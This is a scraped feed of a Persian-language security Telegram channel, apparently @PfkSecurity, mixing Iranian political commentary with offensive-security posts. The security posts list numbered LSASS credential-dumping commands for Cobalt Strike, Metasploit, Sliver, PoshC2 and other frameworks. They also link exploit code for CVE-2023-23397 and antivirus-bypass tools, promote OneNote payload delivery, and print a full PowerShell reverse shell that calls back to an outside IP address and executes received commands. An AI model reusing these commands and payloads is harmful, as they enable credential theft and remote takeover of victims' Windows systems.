#0x06 > FTK Imager

Methods: Create Disk Image Physical Drive Capture Memory LSASS.exe

#0x07 > Volatility

Methods: Pstree volatility -f memory_dump.raw –profile=Win7SP1x64 memdump -p -D

#0x08 > WinPmem

Methods: winpmem.exe -o dump.raw

#0x09 > hiberfil.sys

Methods: windbg.exe -y srvc:\symbolshttps://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys Yes !process 0 0 lsass.exe !process 0 0 lsass.exe; .dump /ma 

#0x10 > Windows Error Reporting
Methods: HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps->DumpType->2 Lsass-Shtinkering.exe

#0x11 > LiveKd
Methods: LiveKd.exe -w !process 0 0 lsass.exe .process /p [lsass PID] .dump /ma [dump file path]

#0x12 > Task Manager
Methods: Powershell -ep bypass Get-Process lsass C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=

#0x13 > Cobalt Strike+SharpDump
Methods: Execute-assembly SharpDump Or load sharpdump

sharpdump

#0x14 > Cobalt Strike+mimikatz_command
Methods: Mimikatz_command sekurlsa::minidump

#0x15 > Cobalt Strike+taskkill
Methods: taskkill /f /im lsass.exe

#Lsass
@PfkSecurity

CVE-2023-23397

Microsoft Office Outlook
حاوی یک آسیب‌پذیری افزایش دسترسی است که به یک حمله NTLM Relay علیه سرویس دیگری اجازه می‌دهد تا به عنوان کاربر احراز هویت شود.

https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY

https://github.com/api0cradle/CVE-2023-23397-POC-Powershell

#CVE #Privesc
@PfkSecurity

💠 کمی عقب بایستید. یک لیوان آب بخورید. نفس عمیق بکشید و صحنه رو ببینید.
جمهوری اسلامی توانست با بازی تجزیه‌طلبی، که بیشتر یک فوبیای ذهنیه و نه خطر واقعی روی زمین، مانع از شکل‌گیری همگرایی همه‌ی نیروها بر ضد خودش بشه. بد بازی خوردیم دوستان.
گاهی استفاده از هوش، بد نیست.
@PfkSecurity

💠 قشری از براندازان قراره تا یک ماه با بمباران رسانه ای سرخوش و مدهوش باشن و گمان کنن اپوزوسیونی به صورت طوفانی پیش میره و مسیر سقوط رو هموار می کنه..
رسانه هایی نظیر ایران اینترنشنال و من و تو و.. با انواع و اقسام تیتر های مسرت بخش، جو رو هیجانی خواهند کرد و کنش هایی با استدلال منطقی و چاره اندیشی تخصصی جای خودشون رو به کنش های سطحی و سانتیمانتال خواهند داد..

با عرض معذرت؛ یک الی دو ماه دیگر با سیل "چسناله" و "ناامیدی" از سوی این عزیزان رو به رو خواهیم شد..

یک الی دو ماه دیگر به این پست بازمیگردیم..
"زمان بهترین قاضی و آموزگار است"

@pfksecurity

#bypass #av
بایپس آنتی ویروس

https://github.com/SurrealSky/byPassAVMake

@PfkSecurity

پایگاه دانش reproduction آسیب پذیری Vulhub
https://github.com/Threekiii/Vulhub-Reproduce

#vulnerability
@PfkSecurity

💠 این جمله چامسکی به شکل وحشتناکی توصیف کننده وضعیت ما در این چند دهه است:

"هوشمندانه ترین راه برای منفعل و مطیع نگه‌داشتن مردم این‌ست که؛ حیطه عقاید قابل پذیرش مردم را سرسختانه محدود نگه داشت، ولی اجازه داد که بصورت عمیق در آن حیطه بحث و تبادل اندیشه داشته باشند."

#MahsaAmini
@PfkSecurity

#Cobalt_Strike

مجموعه فایل های Beacon Object (BOF) برای Cobalt Strike

https://github.com/REDMED-X/OperatorsKit

@BlueRedTeam
@PfkSecurity

🍊حکایت پرتقال در بطری!


🔻پدری به پسر خردسالش یک بطری کوچک داد، که داخل آن یک عدد پرتقال بزرگ بود!!

کودک با تعجب درون بطری را نگاه می‌کرد و با خود می‌گفت: پرتقال به این بزرگی چطوری داخل این بطری کوچک رفته؟

کودک خیلی تلاش کرد تا پرتقال را از بطری خارج کند، اما بی فایده بود!

سپس کودک از پدرش پرسید: چه جوری این پرتقال بزرگ داخل بطری رفتە است؟ آخر دهنەی این بطری خیلی کوچک است!!

پدر، پسر را به باغ برد و یک بطری خالی کوچک را به یکی از شاخه های درخت پرتقال بست. سپس ساقه ای که شکوفه‌ی کوچک پرتقال داشت را درون بطری گذاشت، روزها سپری شد و شکوفه تبدیل به یک پرتقال بزرگ شد تا جایی که امکان خروج از بطری غیرممکن شده بود...

بعد از مشاهده این موضوع، کودک راز پرتقال را فهمید و جایی برای تعجب نمانده بود.  پدر رو به پسر کرد و گفت:

چیزی که امروز مشاهده کردی همان دین است، اگر از خردسالی بذر اعتقادات دینی را درون ذهن کودک بکاریم در هنگام بزرگی، خارج کردنش خیلی سخت می‌شود.

دقیقا مثل این پرتقال که خارج کردنش محال است، مگر اینکه شیشه را بشکنیم و از بین ببریم.

وقتی که ادیان و حکومت های دینی اصرار دارند، افراد جامعه را از سنین بسیار کم و خردسالی در مدارس و مهدهای کودک با مذهب و آموزه‌هایش آشنا کنند...
در واقع آنها اعتراف می‌کنند، که هدفشان  تلقین و القای واقعی بودن و درستی دین نیست!!

✍ صادق هدایت

📌دلیل:
چون انسان در دوران کودکی، نه سواد کافی دارد، نه قدرت تشخیص دادن درست از نادرست را و در ناآگاهی به سر می‌برد!!..
به این دوران در روانشناسی می‌گویند: ذهن سازی
طبق قاعده، آموزش در کودکی مانند نقاشی روی سنگ است که به سادگی پاک نمی‌شود، حال چه آموزش جهل باشد و چه پرورش ذهن پرسشگر.

💡بهترین هدیه ما به فرزندانمان «آگاهی» است تا از گزند استثمارگران چپ و راست (با ابزار ایدئولوژی) رهایی یابد.


@pfksecurity

💠 #طرح_صدام_حسینی مجلس برای مجازات اظهارنظر افراد مشهور‼️

🔹 ١٠ تا ١۵ سال حبس، جزای نقدی و ۵ تا ١٠ سال محرومیت از حقوق اجتماعی، جریمه‌ی روشنگری!!!

🔹هر فرد مشهور حتی از نظر علمی با هر نوع اظهار نظر حتی از طریق مقالات علمی مشمول این مجازات است/اعتماد

🔸برهانی(حقوقدان) در واکنش به طرح مجلس برای ممنوعیت اظهار نظر افراد مشهور گفت:

آزادی بیان، شهادتت مبارک.

🔸محسن برهانی(حقوقدان) در واکنش به طرح مجلس برای کنترل فعالیت و اظهار نظر افراد مشهور در توییتی نوشت:

خلاصه این طرح یعنی فکر نکنید و نظر ندهید تا فقط مراجع حکومتی نظر دهند! به فردای بعد از دوره نمایندگی هم فکر کنید؛ روزی که این مزخرفات، دامنتان را می‌گیرد. آزادی بیان، شهادتت مبارک.

@PfkSecurity

#0x16 > Cobalt Strike+Sysinternals
Methods: load sysinternals Procexp “File” -> “Save”

Cobalt Strike+schtasks Methods: cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR "'’rundll32.exe’’ C:\windows\system32\comsvcs.dll MiniDump “+strPID+” C:\Windows\Tasks\dump.bin full" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ‘ -Force;”

#0x17 >Brute Ratel C4+Kiwi

Methods: load kiwi Lsa_dump_sam lsa_dump_secrets

#0x18 > Metasploit+lsassy
Methods: use post/windows/gather/credentials/lsassy set SESSION Run or exploit

#0x19 > Covenant+SharpKatz
Methods: Create Task->Module->SharpKatz Arguments->lsa_dump

#0x20 >Empire+wmiexec
Methods: Modules credentials/mimikatz/lsass_dump Execute or run sekurlsa::minidump

#0x21> Sliver+lsass_dump
Methods: use lsass_dump Options run

#0x22 > Villain
Methods: villain.exe agent villain.exe client -c villain.exe dump lsass

#0x23 > Octopus
Methods: pupy.exe shell –cmd “python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp”

#0x24 > NimPlant
Methods: lsassdump

#0x25 > PoshC2+MiniDumpWriteDump
Methods: MiniDumpWriteDump Get-LsassDumpProcDump

#0x26 > PoshC2+NtQueryVirtualMemory
Methods: NtQueryVirtualMemory Get-LsassDumpNtQueryVirtualMemory

#0x27 > PoshC2+BloodHound
Methods: Get-LsassDumpBloodHound

#Lass
@PfkSecurity

💠 بریتانیا طرح تروریستی اعلام شدن سپاه را از دستور کار خارج کرد.
@PfkSecurity

PPLmedic

Dump the memory of any PPL with a Userland exploit chain

Blog:
https://blog.scrt.ch/2023/03/17/bypassing-ppl-in-userland-again/

@pfksecurity

هیچ کشوری از اتحادیه اروپا به جز مجارستان و لهستان امروز در مراسم روی کار آمدن جمهوری‌اسلامی شرکت نکرد.🔥✌️
‏‌
@pfksecurity

💠 ‏یه اپوزیسیونی که صندوق پشتوانه مالی اعتصاب نتونست تشکیل بده و یه وی‌پی ان درست و حسابی یا استارلینک رو نتونست ایران بفرسته، چجوری میشه اعتماد کرد بره پولهای بلوکه شده رو درست خرج بکنه و به باد نده...
هر تلاشی بوده پراکنده و از فعالین مستقل بوده!

"گالادریل"

پ.ن: افرادی در قالب اپوزوسیون میخواهند پول های مردم ایران که توسط دول غربی بلوکه شده را به بهانه مبارزه با رژیم آزاد کرده و استفاده کنند.

@PfkSecurity

نحوه استفاده از Microsoft OneNote در ویندوز
[+] مقدمه ای بر Microsoft OneNote - Payload Delivery
با توجه به تطبیق بیشتر و بیشتر گروه‌های APT با Microsoft OneNote برای Payload Delivery، داشتن حداقل درک سطح بالا از نحوه انجام و اجرای دقیق حمله در زیر hood بسیار مهم است. در ویدئو بالا ، نحوه عملکرد حمله به تفصیل شرح داده شده است، و یک توضیح گام به گام در مورد آماده سازی مورد نیاز برای Payload Delivery از طریق Microsoft OneNote ارائه می شود. یک بهانه نمونه نیز در این ویدئو ارائه شده است (تار کردن یک تصویر محرمانه، تحریک قربانی برای "دابل کلیک برای مشاهده"). می تواند مرجع مفیدی برای دستیابی به دسترسی اولیه برای engagement بعدی شما باشد.
#APT
@PfkSecurity

OSINT پادکست های :

- Breadcrumbs by TraceLabs (twitter - Mastodon)
- The Privacy, Security, & OSINT Show by Michael Bazzell (twitter)
- Layer8 Podcast by Layer8 (twitter)
- The OSINT Jobs Podcast by OSINT Jobs (twitter)
- Exposing the Invisible by Tactical Tech (twitter - Mastodon)
- The Intelligence Brief by HENSHOLDT (twitter)
- The OSINT Curious Project
- Spanish OSINT Podcast: Brigada Osint (Discord)
#podcast
@BlackBoxOsint

پاورشل یک سوکت TCP را در سرور راه دور باز می کند و ورودی را به عنوان یک فرمان اجرا می کند و خروجی را به عقب می فرستد.
بکدور احمقانه!

استفاده:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0.. 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding) .GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

#powershell
@PfkSecurity

🔖 برای پیروز شدن نیازی به اکثریت نیست...
بلکه یک اقلیت خشمگین و خستگی ناپذیر نیاز است که مشتاق بر افروختن آتش آزادی در ذهن انسانها است.

ساموئل آدامز
@PfkSecurity